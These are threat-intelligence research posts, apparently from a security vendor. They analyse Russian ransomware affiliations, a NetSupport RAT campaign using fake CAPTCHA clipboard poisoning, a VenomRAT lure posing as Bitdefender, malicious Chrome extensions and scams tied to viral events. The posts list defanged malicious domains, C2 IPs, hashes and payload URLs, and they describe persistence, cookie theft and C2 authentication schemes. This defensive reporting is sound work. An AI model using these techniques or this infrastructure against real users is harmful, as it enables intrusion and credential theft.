Research

Understanding the landscape of cyber threats, particularly Russian-affiliated ransomware, is a complex and evolving challenge. The traditional model of tracking distinct, unified ransomware groups is becoming increasingly difficult. In the "post-Conti era," ransomware has transformed into a marketplace of mutations. It's no longer about centralized operations but rather a fractured ecosystem where allegiances shift and connections are often hidden.

In order to develop a deeper understanding and help others in the community in the process, Jon DiMaggio at Analyst1, Scylla Intel, and the DomainTools Investigations Team dove into a research project that culminated into a detailed infographic called “A Visual and Analytical Map of Russian-affiliated Ransomware Groups.” This work follows previous research DomainTools undertook in tracking ransomware families and provides a visual representation of complex connections in this space.

The goal of this project was not simply attribution or listing individual groups. Instead, we set out to map hidden connections between criminal factions, going beyond just mapping "families" to understand the intricate relationships between them. The core focus was on identifying overlaps in human operators, code fragments, infrastructure, and TTPs (Tactics, Techniques, and Procedures). 

The Creation Process: A "Spider-Out" Investigation

Creating this map required a deep dive into the operational realities of various ransomware actors. Our methodology involved performing a "spider-out" incremental investigation. We began with well-known groups like Conti, LockBit, and Evil Corp, then expanded our research outwards, following the threads of connection.

To gather the necessary information, we drew upon a variety of sources:

• OSINT (Open-Source Intelligence)
• Historic infrastructure data
• Proprietary threat intelligence
• HUMINT (Human Intelligence) 

It's important to note that the analysis only includes publicly available information; nothing is revealed that could tip off adversaries.

Our analysis of these diverse data points helped isolate valuable signals from the surrounding noise. This included overlapping IP addresses, passive DNS records, shared certificates, web content, and delivery vectors used by different groups. These infrastructure overlaps imply potential resource pooling, bulletproof hosting, or affiliate-level reuse. We also analyzed code and TTP crossovers, such as the overlap between Black Basta and Qakbot or the use of legacy Trickbot infrastructure. The prevalence of shared tools like AnyDesk and Quick Assist also suggested common training, playbooks, or crossovers in operator organizations. And finally, we looked closely at the most important element, the people in these groups.

Visualizing the Overlaps: Human Capital and Operator Drift

Perhaps one of the most significant findings visualized in the infographic is the human overlap and operator drift. Our research uncovered instances of known individual actors migrating across different ransomware ecosystems. For example, sources indicate individuals like “Wazawaka” have been associated with multiple groups including REvil, Babuk, LockBit, Hive, and Conti. Similarly, "Bassterlord" moved from REvil to Avaddon, then to LockBit, and finally to Hive.

This phenomenon highlights a crucial insight: brand allegiance among these operators is weak, and human capital appears to be the primary asset, rather than specific malware strains. Operators adapt to market conditions, reorganize in response to takedowns, and trust relationships are critical. These individuals will choose to work with people they know regardless of the name of the organization. Indeed, rebranding in this context is a feature, not a bug. The infographic helps to visualize how these individuals move between groups, carrying their expertise and capabilities with them.

Key Takeaways from the Mapping:

The creation of this infographic reinforces several strategic takeaways:

• Reuse does not equal identity. Different groups may share code or have human overlap but are not the same entity.
• Group labeling is increasingly obsolete.
• The modern threat landscape is best understood by tracking clusters of activity, not just named groups, and focusing on similar activity rather than specific names.

This new perspective, visually represented in this infographic, is crucial for understanding how ransomware operations function today. Groups act like modules, specializing and adapting as the marketplace matures. They exhibit a separation of responsibilities, with distinct roles for negotiators, developers, infrastructure managers, and leadership. Sanctions evasion strategies, such as Evil Corp’s repeated rebranding paired with infrastructure reuse, prove that while names may change, capabilities endure.

Understanding these hidden alliances and overlaps is key to developing and maturing more effective disruption strategies. As a community, we need to evolve how we track actors and criminal brands, recognizing that shared infrastructure or website artifacts might serve as more stable "fingerprints" than group names.

The full infographic provides a comprehensive visual guide to these complex relationships. We believe this work offers a new lens through which to view and counter Russian-affiliated ransomware, emphasizing the need to understand the underlying ecosystem and human networks rather than just transient names and tools.

This report details a malicious campaign that uses deceptive websites, including spoofed Gitcodes and fake Docusign verification pages, to trick users into running malicious PowerShell scripts on their Windows machines. Victims are lured into copying and pasting these scripts into their Windows Run prompt, which then download and execute multiple stages of additional scripts, ultimately leading to the installation of the NetSupport RAT (remote access trojan).

Malicious Multi-Stage Downloader Powershell Scripts Identified

Our team identified malicious multi-stage downloader Powershell scripts hosted on multiple themed websites including Gitcodes and fake Docusign captcha verifications. These sites attempt to deceive users into copying and running an initial powershell script on their Windows Run command. Upon doing so, the powershell script downloads another downloader script and executes on the system, which in turn retrieves additional payloads and executes them eventually installing NetSupport RAT on the infected machines.

Malicious Powershell Scripts Hosted on Gitcodes

Malicious Powershell scripts were found to be hosted on instances of Gitcodes sites for the purpose of downloading second stage Powershell scripts. The second stage also functioned as downloaders, making 3 or more web requests to retrieve and execute a third stage of scripts from other domains, which then retrieve and run a fourth stage resulting in NetSupport RAT running on the victim host. 

Domain: gitcodes[.]org resolving website with a Gitcodes service running titled: “Gitcodes - #1 paste tool since 2002!” Gitcodes is populated with a malicious Powershell script that concatenates multiple strings to form a domain. It then initiates a web request using the specified user agent and domain to download and run the returned script.

The retrieved script from tradingviewtool[.]com subsequently invokes additional web requests to download 3 files from a different domain “tradingviewtoolz[.]com” and also initiates multiple requests to tradingviewtool[.]com. Initially the script reaches out to https[:]//tradingviewtool[.]com/info2.php, which appears to be a method of checking in with the computer name to record the initial execution of the script. Once the script completes its intended purpose and cleans up its local artifacts, it calls out to the same domain again at https[:]//tradingviewtool[.]com/info3.php with the computer name likely indicating the host is infected.

As seen in the capture above, this second stage script performs a series of malicious actions to install a payload and make it persistent, all while trying to hide its activities and deceive the user. The script essentially functions as a downloader, retrieving NetSupport RAT and running it on the system. The three files contain a legitimate 7zip executable, which it uses to unpack “client32.exe” and creates a new entry in the Windows Registry's "Run" key for the current user for it. This ensures that `client32.exe` will automatically start every time the user logs in, establishing persistence for the malware. Naming it "My Support" is an attempt to make it look less suspicious in lists of startup programs.

Uncovering the Broader Malware Ecosystem Behind the Campaign

The observed infrastructure had a wider variety though the combination of registration and website configurations as well as the repeat use of malicious payloads enabled the identification of additional lure sites serving similar malicious downloader scripts.

Registrar:

• Cloudflare
• NameCheap
• NameSilo

NameServer: 

• cloudflare[.]com
• luxhost[.]org
• namecheaphosting[.]com

SSL Issuer: WE1

Website Title contains Gitcodes

Example 1:

Example 2:

Fake Docusign CAPTCHAs Used to Deploy NetSupport RAT

Pivoting on the Netsupport RATs being distributed and the associated infrastructure, additional malware distribution domains were identified including Docusign spoofed websites. Similar to the Gitcodes sites, multiple stages of script downloaders were observed resulting in Netsupport RATs being installed on victim machines.

An initial payload retrieves a “s.php” file from a domain spoofing as docusign. It then unzips the file and launches a script within it.

docusign.sa[.]com

‍

The main malicious functionality is present in “docusign.sa[.]com/verification/s.php,” which is initially ROT13 encoded, likely to avoid signature detections and obfuscation. ROT13 or rotate 13, is a form of Caesar Cipher in which a simple letter substitution replaces each letter with the 13th letter after it in the alphabet. Completing this operation twice effectively decodes the text.

The page is designed to look like a Cloudflare "Checking your browser" / CAPTCHA page, mixed with Docusign branding. The initial screen presents a fake CAPTCHA checkbox (.captcha-check). Upon clicking, "s.php?an=0" is triggered, likely for logging the click attempt. The page then initiates Clipboard Poisoning, in which a “unsecuredCopyToClipboard()” function is called, copying an encoded multi-layered string to the user’s clipboard. The user is instructed to (Win+R, Ctrl+V, Enter) or in other words, open their Window’s Run prompt, copy in the malicious script, and run it. 

Also on the s.php page, after the clipboard poisoning, an interval timer is set to make an AJAX GET request to c.php every second. If c.php returns "1," the current page (s.php) reloads (window.location.reload()). This is likely a C2 (Command and Control) mechanism waiting for the victim to paste and run the PowerShell script on their machine. 

The string copied to the user’s clipboard decodes to the following PowerShell script:

This script downloads a persistence script, “wbdims.exe,” from Github. It then starts it as a process, creates a COM object for Windows Script Host, which it then uses to create a shortcut in the Startup folder to automatically execute when the user logs in.

While this payload was no longer available during the time of investigation, the expectation is that it checks in with the delivery site via “docusign.sa[.]com/verification/c.php.” Upon doing so, it triggers a refresh in the browser for the page to display the content of “docusign.sa[.]com/verification/s.php?an=1.”

The initial clipboard poisoning delivered a first-stage PowerShell downloader. The refresh of s.php (to s.php?an=1) delivers this second-stage PowerShell script, which then downloads and executes a third-stage payload (jp2launcher.exe from the zip file) retrieved by passing “an=2” argument to the same php page “docusign.sa[.]com/verification/s.php?an=2.”

Downloaded Zip File: 254732635529a0567babf4f78973ad3af5633fd29734ea831e5792292bbf16cd

The script then unzips the file and starts a process called “jp2launcher.exe”, which subsequently, goes through additional stages of file retrievals and executions resulting in a NetSupport RAT (3acc40334ef86fd0422fb386ca4fb8836c4fa0e722a5fcfa0086b9182127c1d7) being installed on the victim machine with these associated network actions:

http[:]//mhousecreative[.]com

http[:]//170.130.55[.]203:443/fakeurl.htm

In summary, the fake Docusign website is likely distributed via phishing attempts over email and/or social media. It is the beginning of an elaborate multi-stage NetSupport RAT delivery method that relies upon deceiving users into verifying they are humans by copying and running a malicious powershell script on their machines. The multiple stages of scripts downloading and running scripts that download and run yet more scripts is likely an attempt to evade detection and be more resilient to security investigations and takedowns. 

By breaking the attack into small, distinct steps, the attacker increases the chance that at least one stage will slip past initial signature-based defenses. Additionally, the early phase persistence files appear to be short lived or quickly identified and taken down, however the subsequent later stages appear to be active for longer time frames. This demonstrates the method's somewhat effective disposable pawn strategy with a more resilient late game setup. 

The Widening Scope of Clipboard Poisoning Attacks

While the use of ROT13 encoding can make some detections more difficult, particularly when depending on services that attempt to preprocess server scan data, the samples themselves allow for more unique identification such as the consistent use of the same strings and comment values within the php code. 

Pivots on the Clickboard Poisoning scripts identified several other nearly identical instances of the code present on a wider range of spoofed content including Okta and popular media apps. Additionally, Discord and GitHub were also identified as being utilized for hosting the next stage malware such as in the following example.

‍

While attribution of this campaign of activity is unclear, pivots on the associated infrastructure and malware identified reuse of associated NetSupport RAT hashes, similar delivery URL patterns, and similar domain naming and registration patterns observed in a previously reported cluster of SocGholish activity. Notably, the techniques involved are commonplace and NetSupport Manager is a legitimate administration tool known to be leveraged as a RAT by multiple threat groups such as FIN7, Scalert Goldfinch, STORM-0408 and others. 

Key Takeaways and Security Recommendations

This analysis highlights a sophisticated and persistent malicious campaign designed to deliver the NetSupport RAT through deceptive means, primarily leveraging spoofed Gitcodes and fake Docusign verification pages. The attackers employ a multi-stage approach, using seemingly innocuous "verify you are human" CAPTCHAs and malicious PowerShell scripts disguised as legitimate prompts to trick users into infecting their own machines. This method capitalizes on user trust and familiarity with common online interactions, such as document verification and code sharing platforms.

Key Security Recommendations:

• Exercise extreme caution when prompted to copy and paste scripts into the Windows Run prompt: legitimate websites rarely, if ever, require users to execute PowerShell commands directly. Always verify the source and legitimacy of any such requests.
• Be wary of CAPTCHA-like verifications that instruct you to run commands: genuine CAPTCHAs do not involve running scripts. Any prompt to do so should be treated as highly suspicious.
• Verify the authenticity of websites: Double-check the URL and SSL certificates of websites, especially those that request sensitive actions or information. Be cautious of lookalike domains.

This campaign serves as a stark reminder of the evolving threat landscape. Attackers are continuously refining their techniques to exploit user behavior and bypass traditional security measures. Vigilance, user education, and proactive security practices are paramount in defending against these increasingly sophisticated threats. The "self-infect" tactic, while seemingly simple, can be highly effective, emphasizing the need for users to remain skeptical and verify all interactions before acting.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/prove-you-are-human.csv

If the community has any additional input, please let us know.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

A malicious campaign using a fake website to spread VenomRAT, a Remote Access Trojan (RAT), is detailed in this analysis. The malware includes tools for password theft and stealthy access. This research examines the attackers' methods, such as deceptive websites and command infrastructure, indicating a clear intent to target individuals for financial gain by compromising their credentials, crypto wallets, and potentially selling access to their systems.

VenomRAT, StormKitty, and SilentTrinity Deployment

Malicious domain “bitdefender-download[.]com” resolves a website titled “DOWNLOAD FOR WINDOWS,” which spoofs Bitdefender’s Antivirus for Windows download page.

The “Download For Windows” button initiates a file download from the following bitbucket URL: 

“https[:]//bitbucket[.]org/sadsafsadfsadf/dsfgdsgssdfgdsg/downloads/BitDefender.zip,” 

The bitbucket URL redirects to its content source on Amazon S3.

“https[:]//bbuseruploads.s3.amazonaws[.]com/9e2daa63-bae3-4cbb-9f88-8154ba43261f/downloads/aa7b9593-2ccd-4cd0-9e04-9b4a7da9276b/BitDefender.zip.”

‍

‍

The bundled executable StoreInstaller.exe was found to contain malware configurations associated with VenomRAT. It also contained code associated with open source post-exploitation framework SilentTrinity and StormKitty stealer.

A report by Arconis describes VenomRAT as a RAT that originated as a fork of the open-source Quasar RAT. It is often used for initial access and persistence. Capabilities include remote access, stealing credentials, keylogging, exfiltration and more. 

At a high level, the three malware families function as follows:

• VenomRAT provides initial and ongoing access to victim machines
• StormKitty quickly gathers credentials on the system
• SilentTrinity is used for exfiltration and stealthy long term access

The inclusion of SilentTrinity and StormKitty (both open-source malware tools) indicates the attacker’s dual focus: rapidly harvesting financial credentials and crypto wallets during initial access, while also establishing stealthy, persistent access for potential long-term exploitation. The implications of long term access may include repeat compromise or selling access.

VenomRAT

Observed VenomRAT configurations showed multiple identifiable attributes that allowed for reliable pivots to other samples likely created by the same actor including the reuse of the same IP and port, 67.217.228[.]160:4449, for command and control.

Related samples using the same VenomRAT configurations:

‍

VenomRAT C2 IPs

‍

A reused 3389 service configuration was identified via Shodan “hash:-971903248” allowing for pivots to additional IP addresses with the same configurations. Multiple of the IPs were confirmed to be used as C2s for VenomRAT and are suspected to have also been configured by the same actor.

‍

Delivery Sites:

‍

Credential Harvesting Sites

The lure website domain spoofing as Bitdefender was observed with infrastructure and time proximity overlaps to other malicious domains impersonating banks and generic IT services, suspected of being used for phishing activity. 

NameServer: cloudflare.com

IP ISP: cloudflare.com

Registrar:

• PDR Ltd
• GMO Internet
• NameSilo

SSL Issuer:

• Cloudflare TLS
• WE1

Server Type: cloudflare

‍

idram-secure[.]live Spoofs as Armenian IDBank page
idram-secure[.]live Clicking directs to a site titled “ArmCoin” and the content alleges to be IDBank. The text is in Armenian and translates to: “To connect you to Idram Secure, please write to us in the chat. 🎉 Our chat is located in the bottom right corner of the page”
royalbanksecure[.]online Spoofs as Royal Bank of Canada online banking login portal
dataops-tracxn[.]com Spoofs as Microsoft login page

‍

Protection from Open-Source Malware

This investigation reveals a deceptive campaign using VenomRAT, a powerful remote access tool, disguised as a legitimate Bitdefender antivirus download. Imagine clicking a button on what looks like a trusted site, only to unleash a trio of malicious programs – VenomRAT, StormKitty, and SilentTrinity – onto your system. These tools work in concert: VenomRAT sneaks in, StormKitty grabs your passwords and digital wallet info, and SilentTrinity ensures the attacker can stay hidden and maintain control. We tracked down the attackers' command centers, identified other malware they likely used, and uncovered their web of fake download sites and phishing traps spoofing as banks and online services.

This campaign underscores a constant trend: attackers are using sophisticated, modular malware built from open-source components. This "build-your-own-malware" approach makes these attacks more efficient, stealthy, and adaptable. While the open-source nature of these tools can help security experts spot them faster, the primary victims here are everyday internet users. These criminals are after your hard-earned money, targeting your bank accounts and cryptocurrency wallets with fake login pages and malware disguised as safe software.

This isn't just a problem for big companies – it's a threat to everyone online. So, what can you do?

• Be extremely cautious when downloading software. Double-check website addresses to make sure they're legitimate, especially for banking or login pages.
• Never enter your credentials on a site you're not 100% sure about.
• Practice safe internet habits: avoid clicking on suspicious links or opening unexpected email attachments.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/VenomRAT-Malware-Campaign.csv

If the community has any additional input, please let us know.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

An unknown actor has been continuously creating malicious Chrome Browser extensions since approximately February, 2024. The actor creates websites that masquerade as legitimate services, productivity tools, ad and media creation or analysis assistants, VPN services, Crypto, banking and more to direct users to install corresponding malicious extensions on Google’s Chrome Web Store (CWS). The extensions typically have a dual functionality, in which they generally appear to function as intended, but also connect to malicious servers to send user data, receive commands, and execute arbitrary code.

Example: A DeepSeek Chrome Extension themed lure website ‘deepseek-ai[.]link’

The extensions analyzed appear to have working or partially working functionality and are commonly configured with excessive permissions to interact with every site the browser visits and retrieve and execute arbitrary code from a network of other actor controlled domains.

While each extension was found to be relatively different, the hosting infrastructure and code structures were consistent. Multiple extensions were observed using a “onreset” event handler trick on a temporary document object model (DOM) element to execute code, likely to bypass content security policy (CSP). The extensions hardcode one of the actor’s API servers, typically in a file named “background.js” or “background.iife.js” or for older extensions “src/pages/background/index.js.” These files were also found to typically contain the majority of the malicious functionality of the extensions.

Registration Patterns for Actor Lure Websites

Common registration patterns were observed going back to October 2024.

• Registrar: NameSilo, LLC
• NameServer: cloudflare.com
• IP ISP: CloudFlare Inc.
• SSL Issuer Common Name: WE1
• Registrant: Domain Administrator
• Server Type:
  • cloudflare
  • proxygen-bolt
• MX Server: cloudflare.net

Additionally, the use of Facebook Tracker IDs were commonly used.

• Facebook ID
  • 2696720993868113
  • 416208351532463
  • 312497404888286
  • 993764766100733
  • 2901646833326404
  • 541163625350468
  • 965666115394891
  • 1151077320148683
  • 965666115394891

The following are a sampling of the lure websites, which cover a wide range of topics and themes. The list of identified domains are provided on GitHub.

‍

Malicious Extensions

It’s worth noting, the extensions appear to be at least partly functional as it relates to the theme of their lure. However, in the cases where extensions interact with third party services to provide that functionality such as FortiVPN or DeepSeek AI, the extensions hard code the third party API keys into the extension code. An extremely poor security practice.

Example 1: Lure Site of Manus AI to Install an AI Assistant Extension

Lure Domain: manusai[.]sbs Extension Name: manus-ai-free-ai-assistan Extension ID: aeibljandkelbcaaemkdnbaacppjdmom CWS:  https[:]//chromewebstore.google[.]com/detail/manus-ai-free-ai-assistan/aeibljandkelbcaaemkdnbaacppjdmom Extension Filename: aeibljandkelbcaaemkdnbaacppjdmom.crx Extension File Sha256: 3131d15ebea5eb68e636eb804b2de86cc04d8be5d1257c83f2042a391b8e9415 Actor API Domain: api.sprocketwhirl[.]top

‍

The first things to note about the extension are the extensive permissions it attempts to grant itself in the manifest.json file.

The “background.js” script fetches and applies declarativeNetRequest rules from the backend. This allows the author to modify network requests (block, redirect, modify headers) after the extension is installed, bypassing Chrome Web Store review for those changes. This could be used for malicious redirects, ad injection, or tracking.

The background script communicates with api.sprocketwhirl[.]top, sending encrypted system information (platform, language, memory, cores, timezone, IP, country code) and receiving dynamic declarativeNetRequest rules and potentially executable code.

The content script (injected into all pages) executes arbitrary code retrieved from chrome.storage.local (report key), which was placed there by the background script after fetching it from api.sprocketwhirl[.]top.

Example 2: Lure Site of FortiVPN Client Extension

Lure Domain: forti-vpn[.]com Extension Name: fortivpn Extension ID: ccollcihnnpcbjcgcjfmabegkpbehnip CWS: https[:]//chromewebstore.google[.]com/detail/fortivpn/ccollcihnnpcbjcgcjfmabegkpbehnip Extension Filename: ccollcihnnpcbjcgcjfmabegkpbehnip.crx Extension File Sha256: f4fe36cdc9bd1f16d9385e56155aca3723a267bcdf575e925e20bb9a6526b576 Actor API Domain: api.infograph[.]top

‍

The extension also attempts to grant itself extensive permissions as seen from its manifest.json file.

The extension has a dual functionality in which it provides some of the advertised purpose. In this case, a browser extension based VPN service by connecting to wss[:]//leviathan.whale-alert[.]io/ws using a hardcoded API key. At the same time, however, the extension also connects to a malicious backend client wss[:]//api.infograph[.]top/api and listens for commands. It uses a websocket keep-alive mechanism to maintain connectivity to the backend server as well as sending periodic ping and report messages.

When commanded, it uses chrome.cookies.getAll({}) to retrieve all browser cookies, compresses them using pako, encodes them in Base64, and sends them back to the backend infograph[.]top server.

It can be commanded to establish a separate WebSocket connection to act as a network proxy, potentially routing the user’s traffic through malicious servers. The proxy target is provided by the backend command and also implements proxy authentication handling.

The extension fetches arbitrary scripts from an actor-controlled server. It then injects the scripts into active browser tabs by using chrome.tabs.sendMessage to the tab’s content scripts, triggering their execution within the tabs.

Additionally, the extension enables dynamic network rules via setup response from the backend that can contain declarativeNetRequest rules which are then applied, allowing the backend to modify network traffic post-install.

Example 3: Lure of SiteStats Extension

Lure Domain: sitestats[.]world Extension Name: site-stats Extension ID: fcfmhlijjmckglejcgdclfneafoehafm CWS: https[:]//chromewebstore.google[.]com/detail/site-stats/fcfmhlijjmckglejcgdclfneafoehafm?pli=1 Extension Filename: fcfmhlijjmckglejcgdclfneafoehafm.crx Extension File Sha256: d6e179dcab901e81b3340aebaa3e517bb98b09f9fea01e667e594416c10efc44 Actor API Domain: api.zorpleflux[.]top

‍

Like the previous examples, this extension also grants itself extensive permissions and script execution on every site as seen from its manifest.json file.

The extension allows modifying network requests via rules. It is also able to make web requests, which is primarily observational in MV3, but combined with broad host permissions, it can still be used for tracking or reconnaissance.

Similar to the other extensions identified, it connects to an actor controlled backend server, api.zorpleflux[.]top, defined in the “background.iife.js” file. It also sends periodic ping and report messages to the backend server.

It is capable of setting up a secondary proxy WebSocket connection, allowing traffic routing via the user’s browser, commanded by the backend. It implements a reverse proxy functionality by handling proxied requests via fetch, compressing responses with pako, and relaying back to the backend.

The extension also conducts arbitrary script execution it receives from the backend server and uses chrome.tabs.sendMessage to send it to the content script declared in the manifest.json file for execution.

Actor API Endpoints

The extensions hardcode one of the actor’s API servers, typically in a file named “background.js” or “background.iife.js.” In the case of the malicious extension from deepseek-ai[.]link, which directs users to an installation of Chrome extension ID: “pocfdebmmcmfanifcfeeiafokecfkikj.” This extension upon installation actively communicates with another actor domain api.glimmerbloop[.]top to report installation/fingerprinting data and receive instructions/payloads.

Many of the analyzed extensions had variations in functionality and implementation of the API payload execution steps including what browser fingerprinting information was sent in the initial transaction. The following were consistent elements observed:

• Hardcoding actor API domain in “background.js” or “background.iife.js” file
• Use of HMAC with SHA-256 signing algorithm
• Use of JWT authentication
• Use of extension ID in UTF-8 bytes format as a secret key to sign the JWT payload
• Base64 encoding the payload prior to sending to the API server

In order to establish connection to the actor’s API server, the extensions create a token using the standard JWT library that combines a UUID, the extension ID, version, and country code. It then uses HMAC using SHA-256 signing algorithm before adding JWT claims to the payload (Issued At, Expiration Time). Finally, a secret key is used to sign the payload, which was consistently observed as being the UTF-8 bytes of the extension ID string. The output is then Base64 encoded using btoa() and sent to the API server as an authentication mechanism to retrieve arbitrary code to execute by the extension.

The domain registration details of the API endpoints were found to be nearly identical to those of the malicious lure websites with the additional commonalities in website title and content.

• Website Title: SiteName
• Website Content:

A pivot on these domain registration patterns identified the domains provided at the end of this post, suspected to be owned by the actor and used by malicious extensions. Analysis of several extensions identified hard coded domains that were all found to be in the list of identified API domains, further validating the findings.

Fake Websites and Malicious Chrome Extensions

Since at least February 2024, this malicious actor has deployed over 100 fake websites and malicious Chrome extensions with dual functionalities. Analysis revealed these extensions can execute arbitrary code from attacker-controlled servers on all visited websites, enabling credential theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation. Some extensions were also observed attempting to steal all browser cookies, which may lead to account compromises.

Notably, the Chrome Web Store has removed multiple of the actor’s malicious extensions after malware identification. However, the actor’s persistence and the time lag in detection and removal pose a threat to users seeking productivity tools and browser enhancements. Malware distributors such as this often exploit current trends, such as the recent DeepSeek AI media attention, to lure users into installing infected extensions, potentially gaining control over their browsing activity and sensitive data.

All users should protect themselves by exercising caution when installing extensions. Stick to the Chrome Web Store and verified developers, carefully review requested permissions, read reviews, and be wary of lookalike extensions. Keep your browser and antivirus software updated, and regularly review your installed extensions, removing any you don’t need or find suspicious. Vigilance is key to avoiding these threats.

IOCs on GitHub

https://github.com/DomainTools/SecuritySnacks/blob/main/2025/DualFunction-Malware-Chrome-Extensions

If the community has any additional input, please let us know.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

‍

In the fast-paced digital landscape, viral media events capture global attention. From natural disasters and geopolitical shifts to groundbreaking tech releases and cultural phenomena, these moments dominate headlines and online conversations. But as the world's eyes turn towards these events, a different group also takes notice: malicious actors looking to capitalize on the public's interest and urgency.

Our security research team recently undertook a project to identify and analyze scam and malicious domains and websites that emerge in the wake of high-profile viral media events. Leveraging AI-driven research capabilities, we aimed to understand how threat actors exploit these moments for financial gain and other nefarious purposes.

AI-Powered Approach to Identify Viral Media Events

Our research methodology involved using AI to first identify viral media events that occurred between January 1, 2025, and the present. The AI research capability was prompted to pinpoint the approximate start, peak, and end of each event's virality across mass media and wide coverage.

For each identified event, we then tasked the AI with generating a list of keywords likely to appear in domain names or website titles seeking to associate with the event. The prompt for keyword generation was specifically designed to identify terms that scammers might use to create deceptive sites.

We sampled multiple event topics from the AI's output for deeper analysis, including the Los Angeles Fire, "NoKings," DeepSeek / China AI developments, the ongoing Trade War, and the Ukraine/Russia conflict.

An example of the AI's output for a significant tech event is as follows:

By searching for these keywords or similar terms in domain registrations and website titles within the estimated first and last observed timeframes, we detected several domains that appeared to be malicious. It was anticipated that most scam-related or malicious domains would emerge around the peak of viral activity and potentially persist until the latest observed dates. 

A sampling of the malicious findings from the AI-generated keywords for the “Deepseek AI Release & Market Impact” event are shown below.

Malicious Browser Extensions
Windows Trojan Delivery
Windows Trojan Delivery
Fake DeepSeek Meme Coins BeInCrypto site reported similarly appearing sites to market a fake DeepSeek meme coin.

‍

Multiple scams were identified. Perhaps the most financially successful ones relating to the DeepSeek event were fake cryptocurrency meme coins created to capitalize on a growing trend of novice investors looking for the next hyped up moonshot meme coin. In the case of DeepSeek, according to BeInCrypto (cited in the table above), fake meme coins accrued over 46 million dollars worth before the rug was pulled, presumably indicating the scammers had cashed out.

Additionally, multiple malware delivery websites were observed primarily delivering Windows trojans and malicious browser extensions. One extension in particular was observed with capabilities to legitimately use DeepSeek API for working functionality, but also connected to a remote domain to retrieve and execute arbitrary JavaScript files likely for the purpose of credential harvesting or session hijacking.

Expected vs. Actual Findings Regarding Viral Events

Based on the nature of viral events, we anticipated finding websites and domains attempting to:

• Amplify or create spin-off movements to gain attention.
• Sell merchandise related to the event.
• Collect user information (contact details, experiences, etc.) for spam, resale, or phishing.
• Push deceptive or derisive narratives to further enthral individuals in alleged movements, leading to potential merchandise sales, information gathering, or fraudulent donations.
• Act as "ambulance chasers," with alleged law firms soliciting victims of tragedies for potential profit.
• Delivery of malware, adware, or spyware through deceptive downloads.  

While we did observe instances of these expected tactics, our research consistently revealed a predominant motivation across the sampled events: direct financial profit.

For almost all events sampled, we identified websites explicitly seeking to profit by:

• Allegedly to be part of a legitimate donation foundation supporting the cause (e.g., for the LA Fire, the Ukraine/Russia conflict, and other tragedies like the Myanmar earthquakes).
• Selling merchandise related to the event topic.
• Creating and promoting meme cryptocurrency coins based on the event.

Beyond direct financial scams, we also confirmed the presence of websites designed for:

• Malware delivery.
• Information collection schemes.
• Disinformation campaigns aimed at pushing deceptive and derisive narratives.

Emerging Patterns and Linked Actors Across Viral Events

A significant observation was the emergence of common elements across multiple relatively unique-looking websites covering different viral events. This suggests the likelihood of the same actor or group being behind these diverse scams.

One example was websites that appeared to create meme cryptocurrency coins in response to several highly publicized events in the recent US political landscape and natural disasters, including US tariffs, the trade war, and the LA fire. Several sites appeared to share design, language, or infrastructure elements across these seemingly distinct scam sites points towards a connected operation. 

One suspected cluster focused on scamming meme coins commonly utilized IP ISP: Vercel Inc, Registrar: Namecheap, SSL Issuer CN: R10 or R11, and commonly had website titles with a meme coin name in all caps such as LAFIRE, $LAFIRE, GROK and TOOT. Pivots from this pattern identified several other suspected scam meme coin websites including $TittsFart, $TUCHI, $TOOT, $GWOK, and $SUNG, which is a meme of the top Anime show Solo Leveling’s main character Sung Jinwoo.

The most prevalent scams observed were those pushing newly created cryptocurrency meme coins, which attracted novice traders seeking to ride the hype of the viral event to make easy money. Once the meme coin reaches a certain threshold of time or sale price, the scammers would cash out selling all of their coins and the meme coin would subsequently collapse. These meme coin scams were observed in a wide range of events including international conflicts such as the Russian attacks on Ukraine, the US Trade War, the LA Fire, and the Myanmar Earthquake. 

The following are example findings of similar websites, each associated with inactive social media accounts that claim to sell cryptocurrency coins linked to widely publicized media events.

tradewar[.]space, tradewar[.]lol, tradewar[.]site attempt to persuade others to purchase Trade War themed cryptocurrency coins.

‍

‍

lafirebrigade.co[.]uk and lafireonsol[.]xyz attempt to persuade others to purchase a LA Fire-themed cryptocurrency coin.

lafire[.]io is another website attempting to pawn off scam crypto coin LAFIRE as a donation fund tactic. 

Myanmar Meme coin myanmarmeme[.]top

tootonsol[.]xyz

gork[.]ink suspected scam meme coin attempted to capitalize on the recent news hype of the Elon Musk-owned xAI Grok AI model. Decrypt reported the alleged scam meme coin achieved $160 million in market capitalization before crashing.

The second most prevalent scam tactic observed involved fake donations, sometimes masquerading as established entities such as the American Red Cross, World Food Program or LA Fire departments.

Specifically relating to the LA fire event, BforeAI published a report highlighting a similar method of identifying these types of scam domains in which a variety of websites were identified. Their report also noted multiple consistencies in the types of domains and websites being created in the aftermath of natural disasters.

lafirevictimsupport[.]com and lafireonsol[.]xyz purported to collect donations on behalf of the American Red Cross.

donorsee-charitable[.]com cryptocurrency donation scheme for Myanmar earthquake victims purporting to be part of the World Food Program (WFPUSA). 

Malicious Actors Leveraging Viral Media Events for Financial Gain

Our research highlights the clear and present danger posed by malicious actors who quickly leverage viral media events for their own gain. The speed at which these events unfold provides a fertile ground for scammers to deploy a variety of schemes primarily focused on financial exploitation through fake donations, merchandise sales, and cryptocurrency scams. The observed connections between scam sites operating across different viral topics underscore the adaptive and potentially organized nature of these threat actors.

Staying vigilant and critically evaluating any website or domain seeking engagement related to a viral event is crucial. Always verify the legitimacy of organizations, especially those requesting donations or personal information, and be wary of unsolicited offers or urgent calls to action tied to breaking news. As security researchers, we will continue to monitor this evolving threat landscape and share our findings to help the public stay safe online.

Sign Up For DomainTools Investigations’ Newsletter for the Latest Research

Want more from DomainTools Investigations? Be sure to sign up for our monthly newsletter to get the latest research from the team – available on LinkedIn or email.

